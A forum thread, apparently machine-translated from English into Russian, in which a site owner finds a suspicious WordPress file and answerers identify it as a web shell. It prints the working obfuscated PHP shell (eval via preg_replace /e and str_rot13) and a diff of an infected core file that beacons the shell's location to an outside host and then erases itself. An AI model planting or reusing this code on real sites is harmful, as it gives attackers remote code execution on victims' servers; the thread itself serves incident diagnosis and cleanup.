Сайт WordPress взломан? Подозрительные PHP файл

Question

Я нашел подозрительный файл PHP /wp-includes/mera.php

Содержания:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?> 

@preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); Может возможно сделать что-то злонамеренное?

Answer 1

Немедленно удалить файл!

Этот код PHP является модифицированным webshell. Их можно использовать для атаки других веб-сайтов и может привести к серьезным юридическим проблемам!

После удаления вы должны также устранить утечку, которая позволяет файлу!

Answer 2

Да, скрипт PHP позволяет запускать код на Сервере.

Источник: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/

Через diff'ing с чистой WP тарболла, я нашел meta.php был изменен:

988,1004d987 
< 
< check_meta(); 
< function check_meta(){ 
<  $jp = __FILE__; 
<  $jptime = filemtime($jp); 
< 
<  if(time() >= 1472456239){ 
<   $jp_c = file_get_contents($jp); 
<   if($t = @strpos($jp_c,"check_meta();")) { 
<    $contentp = substr($jp_c,0,$t); 
<    if(@file_put_contents($jp, $contentp)){ 
<     @touch($jp,$jptime); 
<    } 
<   } 
<  } 
<  @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php"); 
< } 

FYI, вот md5sums зараженных файлов:

898af479fe6cc3af461c1878763d19f4 ./wp-includes/meta.php 
b657d7c9d9be52771750091df0751fda ./wp-includes/mera.php 

Answer 3

Вы должны установить что-то вроде Wordfence, подключенного к вашему веб-сайту, который будет постоянно проверять все подключаемые и тематические папки в официальных версиях выпуска. Это также поможет предотвратить опасные загрузки файлов, подобные этому.